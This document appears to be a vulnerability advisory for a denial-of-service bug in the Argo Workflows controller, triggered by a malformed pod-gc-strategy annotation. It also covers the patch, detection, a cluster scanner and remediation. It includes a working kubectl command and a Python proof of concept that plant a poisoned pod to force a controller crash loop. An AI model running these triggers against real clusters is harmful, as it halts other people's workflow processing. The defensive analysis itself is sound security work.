CVE-2026-40886: Argo Workflows Controller Crash Loop via Malformed Pod Annotation
An unchecked array index in podGCFromPod() causes a controller-wide panic when processing a malformed pod-gc-strategy annotation, enabling a persistent crash loop that halts all workflow processing.
# A Single Bad Workflow Can Crash Your Entire System
Argo Workflows is software that companies use to run automated tasks in the cloud — think of it like a robot that executes your to-do list. But a newly discovered flaw lets someone sabotage that robot with a single poisoned instruction.
Here's the problem in plain terms: The software checks a special instruction label on workflow tasks, but it doesn't properly verify that the instruction is valid before reading it. When someone adds a deliberately broken instruction, the software tries to process it anyway, crashes, and takes the entire system down with it.
It's like a vending machine that doesn't check if the item number you enter actually exists — instead of safely saying "that doesn't exist," it just breaks.
Who's at risk? Companies using Argo Workflows versions 3.6.5 through 4.0.4 on Kubernetes clusters (a popular cloud platform). Specifically: teams where people can create or modify workflow tasks, whether that's internal employees or outside contractors. If you work for a company running these systems, any person with task-creation access could potentially crash your workflow engine.
Why does this matter? If the system goes down, automated jobs stop running — which might mean delayed data processing, halted deployments, or interrupted services that customers rely on.
What to do about it:
First, check your Argo Workflows version and, if you're affected, update immediately to 4.0.5 or later (or to 3.7.14 if you are staying on the 3.x line).
Second, restrict who can create or modify workflow tasks — treat this permission like access to critical systems.
Third, monitor your system logs for crashes and have a plan to quickly restart the workflow engine if needed.
CVE-2026-40886 is a denial-of-service vulnerability in Argo Workflows' workflow controller, affecting versions 3.6.5 through 4.0.4. A malformed workflows.argoproj.io/pod-gc-strategy annotation on any pod visible to the controller triggers an unchecked array index dereference inside the pod informer's podGCFromPod() function. Because this code executes inside an informer goroutine that runs outside the controller's top-level recover() scope, the resulting panic propagates uncaught and terminates the entire controller process.
The poisoned pod persists in etcd across controller restarts. Every restart re-lists the pod, re-triggers the panic, and crashes again — a deterministic crash loop that completely halts all workflow scheduling until an operator manually deletes the offending pod. CVSS 7.7 HIGH reflects the zero-interaction, persistent, full-service-disruption impact against a multi-tenant orchestration plane.
Root cause: podGCFromPod() splits the pod-gc-strategy annotation value by comma and directly indexes the resulting slice at position [1] without first checking that the slice contains at least two elements, causing an out-of-bounds panic inside an unrecovered informer goroutine.
The controller registers a shared informer over all pods in its watched namespaces. On each AddFunc or UpdateFunc event the informer dispatches to handler code that eventually calls podGCFromPod() to extract GC strategy metadata from pod annotations. The function splits the annotation value on "," and immediately dereferences index [1]:
// Reconstructed Go pseudocode: workflow/controller/pod_gc.go
// Real function: podGCFromPod()
func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
    annotations := pod.GetAnnotations()
    strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
    if !ok {
        return nil
    }
    // strategyAnnotation format expected: "<strategy>,<deleteDelay>"
    // e.g. "OnPodCompletion,30s"
    parts := strings.Split(strategyAnnotation, ",")
    // BUG: no bounds check before indexing parts[1]
    // If annotation is "OnPodCompletion" (no comma), len(parts)==1
    // and parts[1] causes: runtime error: index out of range [1] with length 1
    strategy := wfv1.PodGCStrategy(parts[0])
    deleteDelay := parts[1] // <-- PANIC HERE if len(parts) < 2
    duration, err := time.ParseDuration(deleteDelay)
    if err != nil {
        return nil
    }
    return &wfv1.PodGC{
        Strategy:            strategy,
        DeleteDelayDuration: &metav1.Duration{Duration: duration},
    }
}
What matters here is where this code runs. Pod informer callbacks fire in a goroutine managed by client-go's SharedIndexInformer. The workflow controller wraps its main reconciliation loop in a recover() block, but in Go a deferred recover() only catches panics raised on its own goroutine's call stack, and the informer event handlers run in a separate goroutine with no such recovery. A panic there goes unrecovered, so the Go runtime prints the trace and terminates the whole process with exit status 2.
GOROUTINE STACK AT PANIC (reconstructed from crash log):
goroutine 47 [running]:
runtime/debug.Stack()
/usr/local/go/src/runtime/debug/stack.go:24
runtime.gopanic(0xc000a1e380)
/usr/local/go/src/runtime/panic.go:914
runtime.goPanicIndex(0x1, 0x1) // index=1, len=1
/usr/local/go/src/runtime/panic.go:113
github.com/argoproj/argo-workflows/v3/workflow/controller.podGCFromPod(...)
workflow/controller/pod_gc.go:58
github.com/argoproj/argo-workflows/v3/workflow/controller.(*WorkflowController).podInformerHandler.func2(...)
workflow/controller/informer.go:214
k8s.io/client-go/tools/cache.(*processorListener).run(...)
vendor/k8s.io/client-go/tools/cache/shared_informer.go:911
// NOTE: no recover() frame anywhere in this call stack.
// The controller's main recover() lives in a *different* goroutine.
Exploitation Mechanics
EXPLOIT CHAIN:
1. PRECONDITION: Attacker has any write access to pod annotations in a namespace
watched by the target Argo Workflows controller. This includes:
- Direct kubectl patch access (misconfigured RBAC)
- Any admission webhook bypass
- A compromised workload pod with projected ServiceAccount token
scoped to pod/patch
2. CRAFT MALFORMED ANNOTATION:
Annotate any existing pod (even completed, non-Argo pods if controller
watches cluster-wide) with:
kubectl annotate pod <pod-name> -n <namespace> \
  workflows.argoproj.io/pod-gc-strategy="OnPodCompletion" \
  --overwrite
The annotation intentionally omits the comma-delimited duration field.
Any single-segment string (no comma) triggers len(parts)==1.
3. TRIGGER:
The annotation write generates a MODIFIED event on the pod watch stream.
client-go delivers this event to the informer's UpdateFunc handler within
milliseconds. podGCFromPod() is invoked, hits parts[1], panics.
4. CONTROLLER CRASHES:
Go runtime prints the panic trace to stderr and exits the process with status 2.
Kubernetes restarts the controller pod per its restartPolicy.
5. CRASH LOOP:
On startup, the controller performs a full re-list of all pods via
LIST+WATCH. The poisoned pod is returned in the LIST response.
AddFunc fires. podGCFromPod() panics again. Controller crashes again.
CrashLoopBackOff within 3-4 restart cycles.
6. IMPACT:
All workflow scheduling, step execution, and pod lifecycle management
halts. Existing running pods continue until their own TTL but no new
work is dispatched. Recovery requires manual deletion of the poisoned
pod by a cluster operator with pod/delete permissions.
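Steps 3 to 6 of the chain can be modelled in a few lines. The following is a toy Python simulation, not Argo code: `vulnerable_parse` mirrors the unguarded split-and-index from the reconstruction, `etcd_pods` is a hypothetical stand-in for the pods returned by the controller's initial LIST, and an uncaught `IndexError` plays the role of the Go panic.

```python
"""Toy model of the crash loop: the poisoned pod outlives every restart."""

ANNOTATION = "workflows.argoproj.io/pod-gc-strategy"


def vulnerable_parse(value):
    # Mirrors the unguarded logic: split on "," and index [1] unconditionally.
    parts = value.split(",")
    return parts[0], parts[1]  # IndexError when the value has no comma


def controller_start(etcd_pods):
    """One controller lifetime: re-list every pod and run the handler on each."""
    for pod in etcd_pods:
        value = pod.get("annotations", {}).get(ANNOTATION)
        if value is not None:
            vulnerable_parse(value)


def count_crashes(etcd_pods, restarts):
    """Restart the toy controller `restarts` times and count the crashes."""
    crashes = 0
    for _ in range(restarts):
        try:
            controller_start(etcd_pods)
        except IndexError:
            crashes += 1  # stands in for the process dying on the Go panic
    return crashes


# Hypothetical cluster state: one healthy pod, one poisoned pod.
etcd_pods = [
    {"name": "wf-step-1", "annotations": {ANNOTATION: "OnPodCompletion,30s"}},
    {"name": "gc-poison-poc", "annotations": {ANNOTATION: "OnPodCompletion"}},
]

crashes_before = count_crashes(etcd_pods, restarts=5)

# An operator deletes the poisoned pod; every later start succeeds.
remaining = [p for p in etcd_pods if p["name"] != "gc-poison-poc"]
crashes_after = count_crashes(remaining, restarts=5)

print(crashes_before, crashes_after)  # 5 0
```

The model makes the persistence point concrete: restarting changes nothing because the input that triggers the crash is stored outside the process, and only removing that input ends the loop.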
An attacker can also craft an entirely new pod (rather than annotating an existing one) via the Kubernetes API if they have pods/create in any watched namespace — embedding the malformed annotation at creation time. This requires no existing Argo Workflows infrastructure and no workflow submission permissions.
# PoC: craft poisoned pod manifest
import yaml, subprocess
poisoned_pod = {
"apiVersion": "v1",
"kind": "Pod",
"metadata": {
"name": "gc-poison-poc",
"namespace": "argo",
"annotations": {
# Single token, no comma: len(strings.Split(v, ",")) == 1
# parts[1] -> runtime: index out of range [1] with length 1
"workflows.argoproj.io/pod-gc-strategy": "OnPodCompletion"
}
},
"spec": {
"containers": [{
"name": "pause",
"image": "gcr.io/google_containers/pause:3.1",
}],
"restartPolicy": "Never"
}
}
manifest = yaml.dump(poisoned_pod)
subprocess.run(["kubectl", "apply", "-f", "-"], input=manifest.encode(), check=True)
print("[+] Poisoned pod submitted. Controller crash expected within ~2s.")
print("[+] Delete pod with: kubectl delete pod gc-poison-poc -n argo")
print("[+] Until deleted, controller remains in CrashLoopBackOff.")
Memory Layout
This is a Go runtime panic rather than a traditional heap/stack memory corruption — the "memory" of interest is the Go slice header and the runtime's OOB detection machinery:
SLICE STATE AT PANIC POINT:
strings.Split("OnPodCompletion", ",") returns:
parts (slice header on goroutine stack):
┌─────────────────────────────────────────────────┐
│ ptr → [ "OnPodCompletion" ] @ 0xc0004f2180 │ // backing array (one string element; Go strings are not NUL-terminated)
│ len = 0x0000000000000001 (1 element) │
│ cap = 0x0000000000000001 │
└─────────────────────────────────────────────────┘
ACCESS ATTEMPTED:
parts[1] → index 1 into slice of length 1
Go runtime bounds check (generated by compiler at call site):
CMPQ CX, $0x1 // CX = requested index (1)
JBE runtime.goPanicIndex
// len=1, index=1: 1 >= 1 → PANIC
GOROUTINE STATE AFTER PANIC:
[goroutine 47 — informer processorListener.run()]
status: dead (panic propagated, no recover frame)
[goroutine 1 — controller main loop]
status: also dead — os.Exit(2) called by runtime
All other goroutines: terminated by os.Exit(2)
Process exit code: 2
Patch Analysis
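The fix in 4.0.5 / 3.7.14 adds an explicit bounds check on parts before any index dereference. The patch is also described as validating that the strategy token is a known value before attempting duration parsing, although the reconstruction below shows only the bounds check and the duration error handling: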
// BEFORE (vulnerable): workflow/controller/pod_gc.go ~line 55
func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
    annotations := pod.GetAnnotations()
    strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
    if !ok {
        return nil
    }
    parts := strings.Split(strategyAnnotation, ",")
    // BUG: unconditional index into potentially length-1 slice
    strategy := wfv1.PodGCStrategy(parts[0])
    deleteDelay := parts[1] // panic if no comma in annotation
    duration, err := time.ParseDuration(deleteDelay)
    if err != nil {
        return nil
    }
    return &wfv1.PodGC{
        Strategy:            strategy,
        DeleteDelayDuration: &metav1.Duration{Duration: duration},
    }
}
// AFTER (patched): workflow/controller/pod_gc.go
func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
    annotations := pod.GetAnnotations()
    strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
    if !ok {
        return nil
    }
    parts := strings.Split(strategyAnnotation, ",")
    // FIX: guard on slice length before indexing parts[1]
    if len(parts) < 2 {
        // Malformed or legacy annotation with no duration component.
        // Log and return nil rather than panicking.
        log.WithField("annotation", strategyAnnotation).
            Warn("malformed pod-gc-strategy annotation: missing delete delay, ignoring")
        return nil
    }
    strategy := wfv1.PodGCStrategy(parts[0])
    deleteDelay := parts[1] // safe: len(parts) >= 2 guaranteed above
    duration, err := time.ParseDuration(deleteDelay)
    if err != nil {
        log.WithError(err).Warn("invalid pod-gc delete delay duration, ignoring")
        return nil
    }
    return &wfv1.PodGC{
        Strategy:            strategy,
        DeleteDelayDuration: &metav1.Duration{Duration: duration},
    }
}
The patch is intentionally conservative: rather than attempting to salvage a partial annotation, it returns nil (no GC config) and logs a warning. This means a malformed annotation silently disables pod GC for that pod rather than crashing the controller — an appropriate graceful degradation for a metadata parsing path.
A secondary hardening added in the same commit moves the annotation parsing for all pod lifecycle annotations into a shared validation helper that is called during pod admission by the controller's webhook, rejecting malformed annotations before they can reach the informer path at all.
Detection and Indicators
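The crash signature below is specific to this bug, whether it was triggered deliberately or by accident. The Kubernetes events and restart metrics corroborate a crash loop but can have other causes, so confirm them against the controller logs: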
CRASH SIGNATURE IN CONTROLLER LOGS (stderr):
panic: runtime error: index out of range [1] with length 1
goroutine 47 [running]:
github.com/argoproj/argo-workflows/v3/workflow/controller.podGCFromPod(...)
workflow/controller/pod_gc.go:58 +0x...
KUBERNETES EVENTS:
Type Reason Object Message
Warning BackOff Pod/workflow-controller-xxxxx Back-off restarting failed container
Normal Killing Pod/workflow-controller-xxxxx Stopping container workflow-controller
PROMETHEUS METRICS (if scrape window catches pre-crash):
# process_start_time_seconds is a gauge that takes a new value on every restart,
# so frequent changes within a short window indicate a crash loop
changes(process_start_time_seconds{job="argo-workflows"}[5m]) > 2
AUDIT LOG — identify the poisoning event:
verb: "patch" OR "create"
resource: "pods"
annotations containing: "workflows.argoproj.io/pod-gc-strategy"
annotation value NOT matching regex: ^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$
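The audit-log criteria above can be applied mechanically. The sketch below assumes audit events are available as JSON lines in the `audit.k8s.io/v1` Event shape and that the audit policy records pod writes at `Request` level or higher, since `requestObject` is absent otherwise. The helper names `offending_value` and `find_poisoning_events` are hypothetical.

```python
import json
import re

ANNOTATION = "workflows.argoproj.io/pod-gc-strategy"
VALID = re.compile(r"^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$")
# The criteria above list patch and create; update is added here as an
# assumption, since an update request can also rewrite annotations.
WRITE_VERBS = {"patch", "create", "update"}


def offending_value(event):
    """Return the malformed annotation value carried by an audit event, else None."""
    if event.get("verb") not in WRITE_VERBS:
        return None
    if (event.get("objectRef") or {}).get("resource") != "pods":
        return None
    # A JSON Patch body is a list rather than an object; this sketch skips it.
    body = event.get("requestObject")
    if not isinstance(body, dict):
        return None
    annotations = (body.get("metadata") or {}).get("annotations") or {}
    value = annotations.get(ANNOTATION)
    if not isinstance(value, str) or VALID.fullmatch(value):
        return None
    return value


def find_poisoning_events(lines):
    """Scan JSON-lines audit output; return (user, namespace/name, value) tuples."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        value = offending_value(event)
        if value is None:
            continue
        ref = event.get("objectRef") or {}
        # On create, the pod name may only appear inside the request body.
        name = ref.get("name") or event["requestObject"]["metadata"].get("name")
        user = (event.get("user") or {}).get("username", "?")
        hits.append((user, f"{ref.get('namespace')}/{name}", value))
    return hits
```

Feeding the function the lines of an audit log file returns one tuple per suspicious write, which identifies both the poisoned pod and the account that wrote the annotation.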
To find poisoned pods currently in a cluster before upgrading:
# Scan all pods for malformed pod-gc-strategy annotations
import subprocess, json, re

ANNOTATION = "workflows.argoproj.io/pod-gc-strategy"
VALID = re.compile(r"^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$")

pods = json.loads(subprocess.check_output(
    ["kubectl", "get", "pods", "--all-namespaces", "-o", "json"]
))

for pod in pods["items"]:
    ann = pod["metadata"].get("annotations", {})
    if ANNOTATION in ann:
        val = ann[ANNOTATION]
        if not VALID.match(val):
            ns = pod["metadata"]["namespace"]
            name = pod["metadata"]["name"]
            print(f"[POISONED] {ns}/{name} annotation='{val}'")
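The scanner's regex is stricter than the crash condition. Per the root cause, only a value with no comma yields a one-element slice and panics, while Go's `time.ParseDuration` also accepts units such as `ms` and compound values such as `1h30m` that the regex rejects. The sketch below separates those cases so the truly dangerous pods can be handled first. `classify` and `looks_like_go_duration` are hypothetical helpers, and the duration check is an approximation of Go's grammar, not a port of it.

```python
import re

# Approximation of Go's time.ParseDuration grammar: optional sign, then one or
# more <number><unit> terms. Overflow checks are not modelled.
_GO_DURATION = re.compile(
    r"[+-]?(?:(?:[0-9]+(?:\.[0-9]*)?|\.[0-9]+)(?:ns|us|\u00b5s|\u03bcs|ms|s|m|h))+"
)


def looks_like_go_duration(text):
    """Best-effort check that Go's time.ParseDuration would accept `text`."""
    if text in ("0", "+0", "-0"):  # Go accepts a bare zero without a unit
        return True
    return _GO_DURATION.fullmatch(text) is not None


def classify(value):
    """Classify a pod-gc-strategy value against the reconstructed vulnerable code.

    "panics":  no comma, so the split yields one element and parts[1] is out of range
    "ignored": parts[1] exists but is not a duration; the reconstruction returns nil
    "ok":      parts[1] parses as a duration
    """
    parts = value.split(",")  # yields the same element count as strings.Split
    if len(parts) < 2:
        return "panics"
    return "ok" if looks_like_go_duration(parts[1]) else "ignored"


for sample in ["OnPodCompletion", "OnPodCompletion,30s",
               "OnPodCompletion,1h30m", "OnPodCompletion,soon"]:
    print(f"{sample!r}: {classify(sample)}")
```

Pods classified as "panics" are the ones that keep a vulnerable controller in its crash loop. Values classified as "ok" but flagged by the regex are likely false positives and may not need deleting.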
Remediation
Immediate: Upgrade to Argo Workflows 4.0.5 or 3.7.14. These are the only complete fixes.
If upgrade is blocked: Run the scanner above and delete any pods carrying malformed workflows.argoproj.io/pod-gc-strategy annotations. This will break the crash loop but does not address the underlying code defect — a newly submitted malformed annotation will re-trigger the panic.
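RBAC hardening: Restrict who holds the patch, update, and create verbs on pods in watched namespaces. Kubernetes RBAC has no separate annotate verb; kubectl annotate normally issues a patch request. No workload should require the ability to write workflows.argoproj.io/* annotations to arbitrary pods. Audit your ClusterRoleBindings for roles that grant verbs: ["*"] on resources: ["pods"].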
OPA/Kyverno policy: Deploy a validating admission webhook that enforces the format /^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$/ on workflows.argoproj.io/pod-gc-strategy before any pod reaches etcd. This provides defense-in-depth regardless of controller version.
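As an illustration of what such a policy decides, here is a minimal Python sketch of the validation step inside a validating admission webhook. It assumes the standard `admission.k8s.io/v1` AdmissionReview request and response shapes. `review_pod` is a hypothetical function name, and the HTTPS serving and webhook registration that a real deployment needs are omitted.

```python
import re

ANNOTATION = "workflows.argoproj.io/pod-gc-strategy"
VALID = re.compile(r"^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$")


def review_pod(admission_review):
    """Build an AdmissionReview response that allows or denies the pod."""
    request = admission_review["request"]
    pod = request.get("object") or {}
    annotations = (pod.get("metadata") or {}).get("annotations") or {}
    value = annotations.get(ANNOTATION)

    # Pods without the annotation are out of scope for this policy.
    allowed = value is None or VALID.fullmatch(value) is not None

    response = {"uid": request["uid"], "allowed": allowed}
    if not allowed:
        response["status"] = {
            "code": 403,
            "message": f"{ANNOTATION}={value!r} does not match the required "
                       "'<strategy>,<duration>' format",
        }
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "response": response,
    }
```

For the check to cover both attack paths described earlier, the webhook would need to be registered for CREATE and UPDATE operations on pods. A Kyverno or OPA Gatekeeper rule expressing the same pattern achieves the same effect without custom code.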
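Monitoring: Alert on workflow-controller pod restart rate > 2 in 5 minutes. Restarts at this rate can have other causes (for example OOM kills), so on affected versions treat the alert as a prompt to check the controller logs for the index-out-of-range signature in podGCFromPod().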
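Where no alerting stack is in place, the same threshold can be evaluated from a list of restart timestamps. The sketch below is a plain sliding-window check. `restart_alert` is a hypothetical helper, and how the timestamps are collected (pod status, events, or logs) is left open.

```python
from datetime import datetime, timedelta


def restart_alert(restart_times, threshold=2, window=timedelta(minutes=5)):
    """Return True if more than `threshold` restarts fall inside any `window`."""
    times = sorted(restart_times)
    start = 0
    for end in range(len(times)):
        # Advance the left edge until the span fits inside the window.
        while times[end] - times[start] > window:
            start += 1
        if end - start + 1 > threshold:
            return True
    return False


# Hypothetical restart history: three restarts within two minutes.
t0 = datetime(2026, 1, 1, 12, 0, 0)
history = [t0, t0 + timedelta(minutes=1), t0 + timedelta(minutes=2)]
print(restart_alert(history))  # True
```

The defaults mirror the rule above (more than 2 restarts in 5 minutes). Both can be tuned if the controller restarts for routine reasons such as rolling deployments.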